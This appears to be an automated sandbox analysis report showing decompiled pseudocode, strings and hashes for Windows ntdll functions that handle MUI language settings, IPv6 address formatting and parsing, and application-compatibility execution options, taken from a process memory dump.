								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A2718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A02340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A1E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A0E2A8(_v12,  &_v68, _v16);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A1E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A0E2A8(_t322,  &_v68, _t269);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A2718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A02340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A1E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A0E2A8(_v12,  &_v68, _v16);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A1E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A0E2A8(_t322,  &_v68, _t296);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00a28788
0x00a28788
0x00a28791
0x00a28794
0x00a28798
0x00a2879b
0x00a2879e
0x00a287a1
0x00a287a4
0x00a287a7
0x00a287aa
0x00a287af
0x00a71ad3
0x00a28b0a
0x00a28b0d
0x00a28b13
0x00a28b19
0x00a28b1f
0x00a28b25
0x00a28b2b
0x00a28b31
0x00a28b37
0x00a28b3d
0x00a28b46
0x00a28b46
0x00a287c6
0x00a287d0
0x00a71ae0
0x00a71ae6
0x00a71af8
0x00a71af8
0x00a71afd
0x00a71afe
0x00a71b01
0x00a71b06
0x00a71b06
0x00a287d6
0x00a287f2
0x00a287f7
0x00a28807
0x00a2880a
0x00a2880f
0x00a28810
0x00a28813
0x00a28818
0x00a28818
0x00a2882c
0x00a28831
0x00a28838
0x00a28908
0x00a28920
0x00a289f0
0x00a28a08
0x00a28af6
0x00a28af6
0x00a28af8
0x00a28afb
0x00a71beb
0x00a71beb
0x00a28b04
0x00a71bf8
0x00a71c0e
0x00a71c13
0x00a71c16
0x00a71c16
0x00a71bf8
0x00000000
0x00a28b04
0x00a28a0e
0x00a28a11
0x00a28a14
0x00a28a15
0x00a28a18
0x00a28a22
0x00a28b59
0x00a28a28
0x00a28a3c
0x00a28a3c
0x00a28a42
0x00a71bb0
0x00a71b11
0x00a71b11
0x00000000
0x00a28a48
0x00a28a51
0x00a28a5b
0x00a28a5e
0x00a28a61
0x00a28a69
0x00a28a69
0x00a28a6d
0x00000000
0x00000000
0x00a28a74
0x00a28a7c
0x00a28a7d
0x00a28a91
0x00a28a93
0x00a28a93
0x00a28a98
0x00a28a9b
0x00a28aa1
0x00a28aa1
0x00a28aa4
0x00a28aaa
0x00a28ab1
0x00a28ac5
0x00a28ac7
0x00a28ac7
0x00a28ac5
0x00a28ace
0x00a71bc9
0x00a71bce
0x00a71bd2
0x00a71bd2
0x00a28ad8
0x00a28aeb
0x00a28aeb
0x00a28af0
0x00a28af4
0x00000000
0x00a28af4
0x00a28a42
0x00a28926
0x00a28929
0x00a2892c
0x00a2892d
0x00a28930
0x00a28935
0x00a2893a
0x00a28b51
0x00a28940
0x00a28954
0x00a28954
0x00a2895a
0x00a71b63
0x00000000
0x00a28960
0x00a28969
0x00a28973
0x00a28976
0x00a28979
0x00a2897e
0x00a28981
0x00a28981
0x00a28986
0x00000000
0x00000000
0x00a71b6e
0x00a71b74
0x00a71b7b
0x00a71b8f
0x00a71b91
0x00a71b91
0x00a71b99
0x00a71b9c
0x00a71ba2
0x00a71ba2
0x00a2898c
0x00a28992
0x00a28999
0x00a289ad
0x00a71ba8
0x00a71ba8
0x00a289ad
0x00a289b6
0x00a289c8
0x00a289cd
0x00a289d0
0x00a289d0
0x00a289d6
0x00a289e8
0x00a289e8
0x00a289ed
0x00000000
0x00a289ed
0x00a2895a
0x00a2883e
0x00a28841
0x00a28844
0x00a28845
0x00a28848
0x00a2884d
0x00a28852
0x00a28b49
0x00a28858
0x00a2886c
0x00a2886c
0x00a28872
0x00a71b0e
0x00000000
0x00a28878
0x00a28881
0x00a2888b
0x00a2888e
0x00a28891
0x00a28896
0x00a28899
0x00a28899
0x00a2889e
0x00000000
0x00000000
0x00a71b21
0x00a71b27
0x00a71b2e
0x00a71b42
0x00a71b44
0x00a71b44
0x00a71b4c
0x00a71b4f
0x00a71b55
0x00a71b55
0x00a288a4
0x00a288aa
0x00a288b1
0x00a288c5
0x00a71b5b
0x00a71b5b
0x00a288c5
0x00a288ce
0x00a288e0
0x00a288e5
0x00a288e8
0x00a288e8
0x00a288ee
0x00a28900
0x00a28900
0x00a28905
0x00000000
0x00a28905

APIs

_wcspbrk.LIBCMT ref: 00A28891
_wcspbrk.LIBCMT ref: 00A28979
_wcspbrk.LIBCMT ref: 00A28A61
_wcspbrk.LIBCMT ref: 00A28A9B
_wcspbrk.LIBCMT ref: 00A71B9C

Strings

Kernel-MUI-Language-Disallowed, xrefs: 00A28914
Kernel-MUI-Language-SKU, xrefs: 00A289FC
WindowsExcludedProcs, xrefs: 00A287C1
Kernel-MUI-Number-Allowed, xrefs: 00A287E6
Kernel-MUI-Language-Allowed, xrefs: 00A28827

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
Instruction ID: 503236c3e890c062753b3303cdb6cdf9fdf712f62648cd8bfc69079971de652b
Opcode Fuzzy Hash: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
Instruction Fuzzy Hash: 5BF1F7B2D00219EFCF11EF98DA819EEB7B8FF08300F14846AF505A7251EB359A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A413CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa02926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa09cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A37707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A37707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00a413d5
0x00a413d9
0x00a413dc
0x00a413de
0x00a413e1
0x00a413e8
0x00a413ee
0x00a6e8fd
0x00000000
0x00a6e921
0x00a6e921
0x00a6e928
0x00a6e982
0x00a6e98a
0x00000000
0x00a6e99a
0x00a6e99e
0x00a6e9a3
0x00a6e9a8
0x00a6e9b9
0x00a6e978
0x00000000
0x00a6e978
0x00a6e98a
0x00a6e92a
0x00a6e931
0x00a6e944
0x00a6e944
0x00a6e950
0x00a6e954
0x00a6e959
0x00a6e95e
0x00a6e963
0x00a6e970
0x00000000
0x00a6e975
0x00a6e93b
0x00a6e980
0x00000000
0x00a6e980
0x00a6e942
0x00a6e94b
0x00000000
0x00a6e94b
0x00000000
0x00a6e942
0x00a413f4
0x00a413f4
0x00a413f9
0x00a413fc
0x00a413ff
0x00a41406
0x00a6e9cc
0x00a6e9d2
0x00a6e9d2
0x00a6e9cc
0x00a4140c
0x00a41411
0x00a41431
0x00a4143a
0x00a4143c
0x00a4143f
0x00a4143f
0x00a41442
0x00a41447
0x00a414a8
0x00a414ac
0x00a6e9e2
0x00a6e9e7
0x00a6e9ec
0x00a6ea05
0x00a6ea05
0x00000000
0x00a41449
0x00000000
0x00a41449
0x00a4144c
0x00a41459
0x00a41462
0x00a41469
0x00a4146a
0x00a41470
0x00a41473
0x00a41476
0x00a41476
0x00a41490
0x00a41495
0x00a4138e
0x00a41390
0x00a41397
0x00a41398
0x00a41399
0x00a413a1
0x00a413a4
0x00a413a4
0x00a41498
0x00a4149c
0x00a4149f
0x00a414a2
0x00000000
0x00000000
0x00a414a4
0x00000000
0x00a414a4
0x00a41413
0x00a41415
0x00a41416
0x00a41419
0x00a4141c
0x00a41422
0x00a413b7
0x00a413bc
0x00a413bf
0x00a413bf
0x00a413c2
0x00a41424
0x00a41424
0x00a41424
0x00a41427
0x00a4142b
0x00a4142c
0x00a4142c
0x00a4142c
0x00000000
0x00a4141c
0x00a41411

APIs

___swprintf_l.LIBCMT ref: 00A4146B
___swprintf_l.LIBCMT ref: 00A41490
___swprintf_l.LIBCMT ref: 00A6E970

Strings

ffff:, xrefs: 00A6E94B
::ffff:0:%u.%u.%u.%u, xrefs: 00A6E9B0
::%hs%u.%u.%u.%u, xrefs: 00A6E967
:%u.%u.%u.%u, xrefs: 00A6E9F4

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A37EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A37EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xae2088; // 0x775b8c0e
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00A37F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A0DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xae4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A10D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A53F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A18375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A53F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00A7E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A53F92();
					_t38 = 1;
					L2:
					return E00A0E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00a37f08
0x00a37f0f
0x00a37f12
0x00a37f1b
0x00a37f31
0x00a53ead
0x00a53eb4
0x00000000
0x00000000
0x00a53eba
0x00a53ecd
0x00a53ed2
0x00a53ee1
0x00a53ee7
0x00a53eec
0x00a53f12
0x00a53f18
0x00a53f1a
0x00000000
0x00000000
0x00a53f20
0x00a53f26
0x00a53f28
0x00000000
0x00000000
0x00a53f2e
0x00a53f30
0x00000000
0x00000000
0x00a53f3a
0x00a53f3b
0x00a53f53
0x00a53f64
0x00a53f69
0x00a53f6c
0x00a53f6d
0x00a53f6f
0x00a5e304
0x00a5e30f
0x00a5e315
0x00a5e31e
0x00a5e321
0x00a5e327
0x00a5e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5e32f
0x00a5e32f
0x00a5e337
0x00a5e33a
0x00a5e33b
0x00a5e33d
0x00a5e33f
0x00a5e341
0x00a5e341
0x00a5e34e
0x00a5e353
0x00a5e358
0x00a5e35d
0x00a5e35f
0x00000000
0x00000000
0x00a5e365
0x00a5e365
0x00a5e368
0x00a5e36e
0x00000000
0x00000000
0x00a5e374
0x00a5e32f
0x00a53f75
0x00a53f7a
0x00a53f7c
0x00a53f7e
0x00a53f86
0x00a37f39
0x00a37f47
0x00a37f47
0x00a37f37
0x00a37f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A53F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A5E2FB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A53EC4
Execute=1, xrefs: 00A53F5E
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A53F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A53F4A
CLIENT(ntdll): Processing section info %ws..., xrefs: 00A5E345
ExecuteOptions, xrefs: 00A53F04

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
Instruction ID: bcf8181ec82f7fa613407dd87d0071683dedaee3ec0dbeed21306069688623c8
Opcode Fuzzy Hash: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
Instruction Fuzzy Hash: D2418672A8031C7ADF24DA94DCCAFEE73BCBB54701F0045A9B505A61C1EA709B49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A40B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A40B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A18980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A0DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A40CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A40CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A406BA(_t135, _t178) == 0 || E00A40A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A40CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A40CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A406BA(_t124, _t142) == 0 || E00A40A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00a40b21
0x00a40b24
0x00a40b27
0x00a40b2a
0x00a40b2d
0x00a40b30
0x00a40b33
0x00a40b36
0x00a40b39
0x00a40b3e
0x00a40c65
0x00a40c68
0x00a40c6a
0x00a40c6f
0x00a6eb42
0x00000000
0x00000000
0x00a6eb48
0x00a6eb48
0x00a40c75
0x00a40c7a
0x00a6eb54
0x00000000
0x00000000
0x00000000
0x00a6eb5a
0x00a40c80
0x00a40c84
0x00a6eb98
0x00000000
0x00000000
0x00a6eba6
0x00a40cb8
0x00a40cba
0x00a40cd3
0x00a40cda
0x00a40ce4
0x00a40ce9
0x00000000
0x00a40cec
0x00a40c8c
0x00a6eb63
0x00000000
0x00000000
0x00a6eb70
0x00a6eb75
0x00a6eb7d
0x00000000
0x00000000
0x00a6eb8c
